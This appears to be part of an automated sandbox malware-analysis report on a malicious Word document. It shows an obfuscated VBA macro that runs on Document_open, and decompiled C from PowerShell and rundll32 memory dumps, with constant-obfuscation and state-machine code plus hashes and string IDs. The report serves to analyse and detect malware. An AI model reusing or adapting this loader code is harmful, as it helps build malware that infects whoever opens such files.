                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: ybkwIF

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: sInuFuLII

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: JNPIBwzJy

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: MtSXGFAwF

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: xJhvfW

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: GetObject

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: vXvXQH

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: AnoeDGEY

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: BBnudDV

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Mid

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Len

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: TYMfJE

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: zzXfBb

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: ppqanE

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Create

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: S2xsub800b7

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Tl85j6j2gy2n7qad

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: uFHXMGsDH

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: UupSwG

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: wbcoCJA

                                                                    Line | Instruction | Meta Information
                                                                    9 | Private Sub Document_open() |
                                                                    10 | Xusmagx95iuck_o3o | executed
                                                                    11 | End Sub |


                                                                      Executed Functions

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2097563705.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%


                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:1.7%
                                                                      Dynamic/Decrypted Code Coverage:15.1%
                                                                      Signature Coverage:28.8%
                                                                      Total number of Nodes:73
                                                                      Total number of Limit Nodes:5

                                                                      Graph


                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 91%
                                                                      			E0200A0F1() {
                                                                      				char _v520;
                                                                      				char _v1040;
                                                                      				char _v1560;
                                                                      				signed int _v1564;
                                                                      				intOrPtr _v1568;
                                                                      				intOrPtr _v1572;
                                                                      				signed int _v1576;
                                                                      				signed int _v1580;
                                                                      				signed int _v1584;
                                                                      				signed int _v1588;
                                                                      				signed int _v1592;
                                                                      				signed int _v1596;
                                                                      				signed int _v1600;
                                                                      				signed int _v1604;
                                                                      				signed int _v1608;
                                                                      				signed int _v1612;
                                                                      				signed int _v1616;
                                                                      				signed int _v1620;
                                                                      				signed int _v1624;
                                                                      				signed int _v1628;
                                                                      				signed int _v1632;
                                                                      				signed int _v1636;
                                                                      				signed int _v1640;
                                                                      				signed int _v1644;
                                                                      				signed int _v1648;
                                                                      				signed int _v1652;
                                                                      				signed int _v1656;
                                                                      				signed int _v1660;
                                                                      				signed int _v1664;
                                                                      				signed int _v1668;
                                                                      				signed int _v1672;
                                                                      				signed int _v1676;
                                                                      				signed int _v1680;
                                                                      				signed int _v1684;
                                                                      				signed int _v1688;
                                                                      				signed int _v1692;
                                                                      				signed int _v1696;
                                                                      				signed int _v1700;
                                                                      				signed int _v1704;
                                                                      				signed int _v1708;
                                                                      				signed int _v1712;
                                                                      				signed int _v1716;
                                                                      				signed int _v1720;
                                                                      				signed int _v1724;
                                                                      				signed int _v1728;
                                                                      				signed int _v1732;
                                                                      				signed int _t405;
                                                                      				signed short* _t412;
                                                                      				signed int* _t413;
                                                                      				signed int _t415;
                                                                      				signed int _t416;
                                                                      				signed int _t417;
                                                                      				signed int _t418;
                                                                      				signed int _t419;
                                                                      				signed int _t420;
                                                                      				signed int _t421;
                                                                      				signed int _t422;
                                                                      				signed int _t428;
                                                                      				signed int* _t457;
                                                                      				void* _t458;
                                                                      				signed int _t462;
                                                                      				signed short* _t465;
                                                                      				signed int* _t466;
                                                                      
                                                                      				_t466 =  &_v1732;
                                                                      				_v1572 = 0x462649;
                                                                      				_v1568 = 0x666e6d;
                                                                      				_t413 = 0;
                                                                      				_v1564 = 0;
                                                                      				_v1636 = 0x6ea1;
                                                                      				_v1636 = _v1636 | 0xcaeb1c54;
                                                                      				_v1636 = _v1636 * 0x44;
                                                                      				_t458 = 0x1c8a6667;
                                                                      				_v1636 = _v1636 ^ 0xe68db93d;
                                                                      				_v1700 = 0x9ea9;
                                                                      				_v1700 = _v1700 << 0xa;
                                                                      				_t462 = 0x2b;
                                                                      				_t415 = 0x23;
                                                                      				_v1700 = _v1700 * 0x64;
                                                                      				_v1700 = _v1700 >> 0xc;
                                                                      				_v1700 = _v1700 ^ 0x000f2063;
                                                                      				_v1668 = 0xf2a5;
                                                                      				_v1668 = _v1668 ^ 0x17163b96;
                                                                      				_v1668 = _v1668 ^ 0xad5f2e4e;
                                                                      				_v1668 = _v1668 ^ 0xba49bcd9;
                                                                      				_v1624 = 0xe487;
                                                                      				_v1624 = _v1624 | 0xeb9c80de;
                                                                      				_v1624 = _v1624 ^ 0xeb9c9144;
                                                                      				_v1592 = 0x3881;
                                                                      				_v1592 = _v1592 * 0x6f;
                                                                      				_v1592 = _v1592 ^ 0x0018105e;
                                                                      				_v1724 = 0x49ba;
                                                                      				_v1724 = _v1724 + 0xaf0;
                                                                      				_v1724 = _v1724 / _t462;
                                                                      				_v1724 = _v1724 << 6;
                                                                      				_v1724 = _v1724 ^ 0x00003deb;
                                                                      				_v1612 = 0xba93;
                                                                      				_v1612 = _v1612 << 0xe;
                                                                      				_v1612 = _v1612 ^ 0x2ea4e5a5;
                                                                      				_v1652 = 0x4b77;
                                                                      				_v1652 = _v1652 | 0x65810647;
                                                                      				_v1652 = _v1652 >> 4;
                                                                      				_v1652 = _v1652 ^ 0x065805b9;
                                                                      				_v1588 = 0xa186;
                                                                      				_v1588 = _v1588 + 0xb5c;
                                                                      				_v1588 = _v1588 ^ 0x0000a1c8;
                                                                      				_v1680 = 0xcda8;
                                                                      				_v1680 = _v1680 * 0x54;
                                                                      				_v1680 = _v1680 << 0xa;
                                                                      				_v1680 = _v1680 ^ 0x0deca729;
                                                                      				_v1716 = 0x462e;
                                                                      				_v1716 = _v1716 ^ 0x8d5a910e;
                                                                      				_v1716 = _v1716 + 0xffff4390;
                                                                      				_v1716 = _v1716 << 6;
                                                                      				_v1716 = _v1716 ^ 0x56868d11;
                                                                      				_v1708 = 0x2567;
                                                                      				_v1708 = _v1708 << 0x10;
                                                                      				_v1708 = _v1708 | 0xd57d8b4f;
                                                                      				_v1708 = _v1708 >> 4;
                                                                      				_v1708 = _v1708 ^ 0x0f57bf90;
                                                                      				_v1604 = 0xb0f8;
                                                                      				_v1604 = _v1604 + 0xffffeab4;
                                                                      				_v1604 = _v1604 ^ 0x000092c0;
                                                                      				_v1576 = 0x7d09;
                                                                      				_v1576 = _v1576 << 1;
                                                                      				_v1576 = _v1576 ^ 0x0000cf25;
                                                                      				_v1656 = 0x9d96;
                                                                      				_v1656 = _v1656 / _t415;
                                                                      				_v1656 = _v1656 >> 4;
                                                                      				_v1656 = _v1656 ^ 0x00003825;
                                                                      				_v1728 = 0xae64;
                                                                      				_v1728 = _v1728 >> 0x10;
                                                                      				_t416 = 0x3c;
                                                                      				_v1728 = _v1728 * 0x3d;
                                                                      				_v1728 = _v1728 * 0x64;
                                                                      				_v1728 = _v1728 ^ 0x0000360d;
                                                                      				_v1672 = 0x87c;
                                                                      				_v1672 = _v1672 * 0x4c;
                                                                      				_v1672 = _v1672 | 0xb9377e8f;
                                                                      				_v1672 = _v1672 ^ 0xb937fee9;
                                                                      				_v1596 = 0x755f;
                                                                      				_v1596 = _v1596 << 3;
                                                                      				_v1596 = _v1596 ^ 0x0003dbc7;
                                                                      				_v1580 = 0x3e57;
                                                                      				_v1580 = _v1580 / _t416;
                                                                      				_v1580 = _v1580 ^ 0x000011a5;
                                                                      				_v1732 = 0x638d;
                                                                      				_v1732 = _v1732 ^ 0xa21d193e;
                                                                      				_v1732 = _v1732 ^ 0x99b9aab2;
                                                                      				_v1732 = _v1732 << 0xa;
                                                                      				_v1732 = _v1732 ^ 0x93405e44;
                                                                      				_v1644 = 0x6fb3;
                                                                      				_v1644 = _v1644 >> 0xe;
                                                                      				_v1644 = _v1644 >> 0xa;
                                                                      				_v1644 = _v1644 ^ 0x00001043;
                                                                      				_v1584 = 0x2384;
                                                                      				_v1584 = _v1584 | 0x2b24236c;
                                                                      				_v1584 = _v1584 ^ 0x2b240980;
                                                                      				_v1664 = 0xc490;
                                                                      				_v1664 = _v1664 + 0xffffef59;
                                                                      				_t417 = 0x46;
                                                                      				_v1664 = _v1664 * 0x1f;
                                                                      				_v1664 = _v1664 ^ 0x0015d474;
                                                                      				_v1676 = 0x3daf;
                                                                      				_v1676 = _v1676 * 0x74;
                                                                      				_v1676 = _v1676 << 0x10;
                                                                      				_v1676 = _v1676 ^ 0xf34c4f53;
                                                                      				_v1684 = 0x7c37;
                                                                      				_v1684 = _v1684 << 0x10;
                                                                      				_v1684 = _v1684 ^ 0xee095b2d;
                                                                      				_v1684 = _v1684 ^ 0x923e0ee4;
                                                                      				_v1688 = 0xf4a0;
                                                                      				_v1688 = _v1688 ^ 0x2a95b5f1;
                                                                      				_v1688 = _v1688 | 0x3f378004;
                                                                      				_v1688 = _v1688 ^ 0x3fb7c4e0;
                                                                      				_v1720 = 0x3554;
                                                                      				_v1720 = _v1720 + 0xcba6;
                                                                      				_v1720 = _v1720 / _t417;
                                                                      				_t418 = 0x29;
                                                                      				_v1720 = _v1720 * 0x6e;
                                                                      				_v1720 = _v1720 ^ 0x00018d2b;
                                                                      				_v1692 = 0xb003;
                                                                      				_v1692 = _v1692 * 0x21;
                                                                      				_v1692 = _v1692 / _t418;
                                                                      				_v1692 = _v1692 ^ 0x0000dafa;
                                                                      				_v1608 = 0x9556;
                                                                      				_v1608 = _v1608 << 6;
                                                                      				_v1608 = _v1608 ^ 0x0025285b;
                                                                      				_v1712 = 0x7c63;
                                                                      				_v1712 = _v1712 + 0xd61;
                                                                      				_v1712 = _v1712 | 0xf93ff987;
                                                                      				_v1712 = _v1712 + 0xffff3f2f;
                                                                      				_v1712 = _v1712 ^ 0xf93f3a22;
                                                                      				_v1616 = 0xf4ab;
                                                                      				_t419 = 6;
                                                                      				_v1616 = _v1616 * 0x6e;
                                                                      				_v1616 = _v1616 ^ 0x00690dca;
                                                                      				_v1620 = 0x70bb;
                                                                      				_v1620 = _v1620 + 0x70ef;
                                                                      				_v1620 = _v1620 ^ 0x0000b67e;
                                                                      				_v1704 = 0x2bc1;
                                                                      				_v1704 = _v1704 << 7;
                                                                      				_v1704 = _v1704 >> 8;
                                                                      				_v1704 = _v1704 >> 5;
                                                                      				_v1704 = _v1704 ^ 0x000077dd;
                                                                      				_v1648 = 0x7a74;
                                                                      				_v1648 = _v1648 + 0xffff7142;
                                                                      				_v1648 = _v1648 + 0xffff0d10;
                                                                      				_v1648 = _v1648 ^ 0xfffe8588;
                                                                      				_v1660 = 0x319c;
                                                                      				_v1660 = _v1660 / _t419;
                                                                      				_v1660 = _v1660 + 0xffff3bc4;
                                                                      				_v1660 = _v1660 ^ 0xffff411a;
                                                                      				_v1632 = 0x6a97;
                                                                      				_v1632 = _v1632 / _t462;
                                                                      				_v1632 = _v1632 + 0xf6cf;
                                                                      				_v1632 = _v1632 ^ 0x0000a388;
                                                                      				_v1640 = 0x6bc7;
                                                                      				_t420 = 0x28;
                                                                      				_v1640 = _v1640 / _t420;
                                                                      				_t421 = 0x51;
                                                                      				_v1640 = _v1640 / _t421;
                                                                      				_v1640 = _v1640 ^ 0x000021dd;
                                                                      				_v1628 = 0x3b39;
                                                                      				_v1628 = _v1628 | 0xa29391b9;
                                                                      				_v1628 = _v1628 ^ 0xa293ed86;
                                                                      				_v1600 = 0xe9c9;
                                                                      				_v1600 = _v1600 + 0xffff6249;
                                                                      				_v1600 = _v1600 ^ 0x000034d4;
                                                                      				_v1696 = 0xf82d;
                                                                      				_v1696 = _v1696 << 0xc;
                                                                      				_v1696 = _v1696 + 0xffffa8ef;
                                                                      				_t422 = 0x63;
                                                                      				_t465 = _v1628;
                                                                      				_v1696 = _v1696 / _t422;
                                                                      				_v1696 = _v1696 ^ 0x002844a7;
                                                                      				while(_t458 != 0x441c66b) {
                                                                      					if(_t458 == 0x6f1be5d) {
                                                                      						_push(0x1ff14a4);
                                                                      						_push(_v1588);
                                                                      						_push(_v1652);
                                                                      						_t405 = E01FF7F4B( &_v1560, _v1680, E01FF5DFC(_v1724, _v1612, __eflags), _v1716, _v1708); // executed
                                                                      						asm("sbb edi, edi");
                                                                      						_t422 = _v1604;
                                                                      						_t458 = ( ~_t405 & 0xd90426a5) + 0x2b3d9fc6;
                                                                      						E02000D6D(_t422, _v1576, _v1656, _t404);
                                                                      						_t466 =  &(_t466[8]);
                                                                      						goto L20;
                                                                      					} else {
                                                                      						if(_t458 == 0x1c8a6667) {
                                                                      							_t422 = _v1700;
                                                                      							E01FF5755(_t422,  &_v1560, _v1668, _v1624, 0x208);
                                                                      							_t466 =  &(_t466[3]);
                                                                      							_t458 = 0x289b3cf5;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t458 == 0x289b3cf5) {
                                                                      								_t465 = E02000DC5();
                                                                      								_t458 = 0x3ab6a711;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t458 == 0x2c7788d8) {
                                                                      									_push(_t413);
                                                                      									_push(_t465);
                                                                      									_push(_v1696);
                                                                      									_push(_v1600);
                                                                      									_push(_v1628);
                                                                      									_push(_v1640);
                                                                      									_push(_t413);
                                                                      									_push(_t413);
                                                                      									E01FF6417(_v1632, __eflags);
                                                                      									_t413 = 1;
                                                                      									__eflags = 1;
                                                                      								} else {
                                                                      									if(_t458 != 0x3ab6a711) {
                                                                      										L20:
                                                                      										__eflags = _t458 - 0x2b3d9fc6;
                                                                      										if(__eflags != 0) {
                                                                      											continue;
                                                                      										} else {
                                                                      										}
                                                                      									} else {
                                                                      										_t412 = _t465;
                                                                      										if( *_t465 != _t413) {
                                                                      											do {
                                                                      												if( *_t412 == 0x2c) {
                                                                      													_t457 =  &_v1560;
                                                                      													while(1) {
                                                                      														_t412 =  &(_t412[1]);
                                                                      														_t428 =  *_t412 & 0x0000ffff;
                                                                      														if(_t428 == 0) {
                                                                      															break;
                                                                      														}
                                                                      														__eflags = _t428 - 0x20;
                                                                      														if(__eflags != 0) {
                                                                      															 *_t457 = _t428;
                                                                      															_t457 =  &(_t457[0]);
                                                                      															__eflags = _t457;
                                                                      															continue;
                                                                      														}
                                                                      														break;
                                                                      													}
                                                                      													_t422 = 0;
                                                                      													 *_t457 = 0;
                                                                      												}
                                                                      												_t412 =  &(_t412[1]);
                                                                      											} while ( *_t412 != _t413);
                                                                      										}
                                                                      										_t458 = 0x6f1be5d;
                                                                      										continue;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					return _t413;
                                                                      				}
                                                                      				_push(_t422);
                                                                      				E01FF471A(_v1636,  &_v520, _v1728, _v1672, _v1596, _v1580, _v1732); // executed
                                                                      				E01FFDFD8(_v1644,  &_v1040, __eflags, _v1584, _v1664);
                                                                      				_push(0x1ff14d4);
                                                                      				_push(_v1720);
                                                                      				_push(_v1688);
                                                                      				E01FFA4D7(__eflags, _v1608, _v1712, _v1616, _v1620, E01FF5DFC(_v1676, _v1684, __eflags),  &_v520, _t465,  &_v1040);
                                                                      				_t422 = _v1704;
                                                                      				E02000D6D(_t422, _v1648, _v1660, _t399);
                                                                      				_t466 =  &(_t466[0x17]);
                                                                      				_t458 = 0x2c7788d8;
                                                                      				goto L20;
                                                                      			}

                                                                      0x0200a6fc
                                                                      0x00000000
                                                                      0x0200a6fc
                                                                      0x0200a6bb
                                                                      0x0200a6af
                                                                      0x0200a6a7
                                                                      0x0200a69f
                                                                      0x0200a8be
                                                                      0x0200a8be
                                                                      0x0200a7b8
                                                                      0x0200a7e2
                                                                      0x0200a800
                                                                      0x0200a805
                                                                      0x0200a80a
                                                                      0x0200a80e
                                                                      0x0200a850
                                                                      0x0200a864
                                                                      0x0200a868
                                                                      0x0200a86d
                                                                      0x0200a870
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$%8$-[$9;$I&F$T5$W>$[(%$_u$a$g%$l#$+$mnf$tz$wK$p
                                                                      • API String ID: 0-3673879503
                                                                      • Opcode ID: 8106242799d15f09af9d7001ad3407363d231666fc1727519f0f3111bcb3efc3
                                                                      • Instruction ID: ce95fe71b732d593927a94e086707e6dc9acb994e2c4e1030390afe4854328fc
                                                                      • Opcode Fuzzy Hash: 8106242799d15f09af9d7001ad3407363d231666fc1727519f0f3111bcb3efc3
                                                                      • Instruction Fuzzy Hash: 3B122271508380CFE369CF65C48AA4BBBF1BBC5748F10891DE2D9862A0D7B98949CF53
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 173 1ff6417-1ff66c4 call 2002550 call 1ff5755 call 200b86e 179 1ff66c9-1ff66ce 173->179 180 1ff670d 179->180 181 1ff66d0-1ff66d2 179->181 184 1ff670f-1ff6715 180->184 182 1ff66d4-1ff66da 181->182 183 1ff66e0-1ff670b call 1fff1ed * 2 181->183 185 1ff66db-1ff66de 182->185 183->185 185->184
                                                                      C-Code - Quality: 22%
                                                                      			E01FF6417(void* __edx, void* __eflags) {
                                                                      				void* _t197;
                                                                      				void* _t213;
                                                                      				void* _t214;
                                                                      				signed int _t218;
                                                                      				signed int _t219;
                                                                      				signed int _t220;
                                                                      				intOrPtr _t234;
                                                                      				intOrPtr _t237;
                                                                      				void* _t240;
                                                                      				void* _t241;
                                                                      
                                                                      				_t240 = _t241 - 0x58;
                                                                      				_push( *((intOrPtr*)(_t240 + 0x7c)));
                                                                      				_t234 =  *((intOrPtr*)(_t240 + 0x60));
                                                                      				_push( *((intOrPtr*)(_t240 + 0x78)));
                                                                      				_push( *((intOrPtr*)(_t240 + 0x74)));
                                                                      				_push( *((intOrPtr*)(_t240 + 0x70)));
                                                                      				_push( *((intOrPtr*)(_t240 + 0x6c)));
                                                                      				_push( *((intOrPtr*)(_t240 + 0x68)));
                                                                      				_push( *((intOrPtr*)(_t240 + 0x64)));
                                                                      				_push(_t234);
                                                                      				_push(__edx);
                                                                      				_push(0);
                                                                      				E02002550(_t197);
                                                                      				 *(_t240 + 0x2c) = 0x767b;
                                                                      				_t218 = 0x49;
                                                                      				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) * 0x7f;
                                                                      				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) / _t218;
                                                                      				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) ^ 0x0000f87c;
                                                                      				 *(_t240 + 0x4c) = 0xef21;
                                                                      				_t219 = 0x58;
                                                                      				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) * 0x51;
                                                                      				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) << 7;
                                                                      				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) ^ 0xa17ee643;
                                                                      				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) ^ 0x84aa5f32;
                                                                      				 *(_t240 + 0x34) = 0x6d8e;
                                                                      				 *(_t240 + 0x34) =  *(_t240 + 0x34) | 0x6849a982;
                                                                      				 *(_t240 + 0x34) =  *(_t240 + 0x34) + 0xc220;
                                                                      				 *(_t240 + 0x34) =  *(_t240 + 0x34) + 0xffff3440;
                                                                      				 *(_t240 + 0x34) =  *(_t240 + 0x34) ^ 0x6849f13e;
                                                                      				 *(_t240 + 0x1c) = 0xa45f;
                                                                      				 *(_t240 + 0x1c) =  *(_t240 + 0x1c) ^ 0x8ac4df42;
                                                                      				 *(_t240 + 0x1c) =  *(_t240 + 0x1c) ^ 0x8ac417ac;
                                                                      				 *(_t240 + 0x48) = 0x404a;
                                                                      				 *(_t240 + 0x48) =  *(_t240 + 0x48) >> 0xa;
                                                                      				 *(_t240 + 0x48) =  *(_t240 + 0x48) / _t219;
                                                                      				 *(_t240 + 0x48) =  *(_t240 + 0x48) + 0xffff6f8b;
                                                                      				 *(_t240 + 0x48) =  *(_t240 + 0x48) ^ 0xffff405a;
                                                                      				 *(_t240 + 0x50) = 0x54f1;
                                                                      				 *(_t240 + 0x50) =  *(_t240 + 0x50) << 0xb;
                                                                      				 *(_t240 + 0x50) =  *(_t240 + 0x50) + 0x3a90;
                                                                      				 *(_t240 + 0x50) =  *(_t240 + 0x50) << 9;
                                                                      				 *(_t240 + 0x50) =  *(_t240 + 0x50) ^ 0x4f85421e;
                                                                      				 *(_t240 + 0x54) = 0x8597;
                                                                      				 *(_t240 + 0x54) =  *(_t240 + 0x54) << 8;
                                                                      				 *(_t240 + 0x54) =  *(_t240 + 0x54) | 0xa9f146ed;
                                                                      				 *(_t240 + 0x54) =  *(_t240 + 0x54) >> 5;
                                                                      				 *(_t240 + 0x54) =  *(_t240 + 0x54) ^ 0x054fb0bb;
                                                                      				 *(_t240 + 0x44) = 0x73dc;
                                                                      				 *(_t240 + 0x44) =  *(_t240 + 0x44) * 0x3b;
                                                                      				 *(_t240 + 0x44) =  *(_t240 + 0x44) + 0xa50b;
                                                                      				 *(_t240 + 0x44) =  *(_t240 + 0x44) ^ 0x812a8e6b;
                                                                      				 *(_t240 + 0x44) =  *(_t240 + 0x44) ^ 0x8131b455;
                                                                      				 *(_t240 + 0x14) = 0x8d69;
                                                                      				 *(_t240 + 0x14) =  *(_t240 + 0x14) << 1;
                                                                      				 *(_t240 + 0x14) =  *(_t240 + 0x14) ^ 0x00015647;
                                                                      				 *(_t240 + 8) = 0x519d;
                                                                      				 *(_t240 + 8) =  *(_t240 + 8) ^ 0xf9151e6a;
                                                                      				 *(_t240 + 8) =  *(_t240 + 8) ^ 0xf9150c68;
                                                                      				 *(_t240 + 0x3c) = 0xc74b;
                                                                      				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) | 0x7e9d0cc5;
                                                                      				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) + 0xffff6740;
                                                                      				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) + 0x85e7;
                                                                      				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) ^ 0x7e9dd5d0;
                                                                      				 *(_t240 + 0x24) = 0x7835;
                                                                      				 *(_t240 + 0x24) =  *(_t240 + 0x24) + 0x26c5;
                                                                      				 *(_t240 + 0x24) =  *(_t240 + 0x24) >> 0x10;
                                                                      				 *(_t240 + 0x24) =  *(_t240 + 0x24) ^ 0x00005957;
                                                                      				 *(_t240 + 0x30) = 0xbe83;
                                                                      				 *(_t240 + 0x30) =  *(_t240 + 0x30) | 0xb98edffe;
                                                                      				 *(_t240 + 0x30) =  *(_t240 + 0x30) << 8;
                                                                      				 *(_t240 + 0x30) =  *(_t240 + 0x30) + 0xffff95b5;
                                                                      				 *(_t240 + 0x30) =  *(_t240 + 0x30) ^ 0x8efff2e6;
                                                                      				 *(_t240 + 0x38) = 0x2bdc;
                                                                      				 *(_t240 + 0x38) =  *(_t240 + 0x38) + 0xdf33;
                                                                      				_t237 = 0x44;
                                                                      				 *(_t240 + 0x38) =  *(_t240 + 0x38) * 0x50;
                                                                      				 *(_t240 + 0x38) =  *(_t240 + 0x38) << 7;
                                                                      				 *(_t240 + 0x38) =  *(_t240 + 0x38) ^ 0x29ba000b;
                                                                      				 *(_t240 + 0xc) = 0x57cb;
                                                                      				 *(_t240 + 0xc) =  *(_t240 + 0xc) + 0x1cd9;
                                                                      				 *(_t240 + 0xc) =  *(_t240 + 0xc) ^ 0x00006426;
                                                                      				 *(_t240 + 0x40) = 0x6f55;
                                                                      				 *(_t240 + 0x40) =  *(_t240 + 0x40) | 0x563c3ba0;
                                                                      				 *(_t240 + 0x40) =  *(_t240 + 0x40) << 0xd;
                                                                      				 *(_t240 + 0x40) =  *(_t240 + 0x40) + 0xfffff8ef;
                                                                      				 *(_t240 + 0x40) =  *(_t240 + 0x40) ^ 0x8ffe8da5;
                                                                      				 *(_t240 + 0x20) = 0x40d0;
                                                                      				 *(_t240 + 0x20) =  *(_t240 + 0x20) * 0x75;
                                                                      				 *(_t240 + 0x20) =  *(_t240 + 0x20) ^ 0x609dd8a9;
                                                                      				 *(_t240 + 0x20) =  *(_t240 + 0x20) ^ 0x608076c4;
                                                                      				 *(_t240 + 0x28) = 0x4853;
                                                                      				 *(_t240 + 0x28) =  *(_t240 + 0x28) ^ 0x8def0e3c;
                                                                      				 *(_t240 + 0x28) =  *(_t240 + 0x28) << 2;
                                                                      				 *(_t240 + 0x28) =  *(_t240 + 0x28) ^ 0x37bd1438;
                                                                      				 *(_t240 + 0x10) = 0x42ee;
                                                                      				 *(_t240 + 0x10) =  *(_t240 + 0x10) * 0x60;
                                                                      				 *(_t240 + 0x10) =  *(_t240 + 0x10) ^ 0x00197620;
                                                                      				 *(_t240 + 0x18) = 0x469;
                                                                      				 *(_t240 + 0x18) =  *(_t240 + 0x18) * 0x15;
                                                                      				 *(_t240 + 0x18) =  *(_t240 + 0x18) ^ 0x00003a34;
                                                                      				_t220 =  *(_t240 + 0x2c);
                                                                      				E01FF5755(_t220, _t240 - 0x4c,  *(_t240 + 0x4c),  *(_t240 + 0x34), _t237);
                                                                      				 *((intOrPtr*)(_t240 - 0x4c)) = _t237;
                                                                      				_push( *(_t240 + 0x24));
                                                                      				_push(_t220);
                                                                      				_push(_t240 - 0x4c);
                                                                      				_push( *(_t240 + 0x3c));
                                                                      				_push( *((intOrPtr*)(_t240 + 0x64)));
                                                                      				_push( *(_t240 + 8));
                                                                      				_push( *(_t240 + 0x14));
                                                                      				_push(_t240 - 8);
                                                                      				_push( *((intOrPtr*)(_t240 + 0x78)));
                                                                      				_push(_t220);
                                                                      				_push( *(_t240 + 0x44));
                                                                      				_push( *(_t240 + 0x54));
                                                                      				_push( *(_t240 + 0x50));
                                                                      				_push( *(_t240 + 0x48));
                                                                      				_t213 = E0200B86E( *((intOrPtr*)(_t240 + 0x7c)),  *(_t240 + 0x1c)); // executed
                                                                      				if(_t213 == 0) {
                                                                      					_t214 = 0;
                                                                      				} else {
                                                                      					if(_t234 == 0) {
                                                                      						E01FFF1ED( *(_t240 + 0x30),  *(_t240 + 0x38),  *(_t240 + 0xc),  *(_t240 + 0x40),  *((intOrPtr*)(_t240 - 8)));
                                                                      						E01FFF1ED( *(_t240 + 0x20),  *(_t240 + 0x28),  *(_t240 + 0x10),  *(_t240 + 0x18),  *((intOrPtr*)(_t240 - 4)));
                                                                      					} else {
                                                                      						asm("movsd");
                                                                      						asm("movsd");
                                                                      						asm("movsd");
                                                                      						asm("movsd");
                                                                      					}
                                                                      					_t214 = 1;
                                                                      				}
                                                                      				return _t214;
                                                                      			}














                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
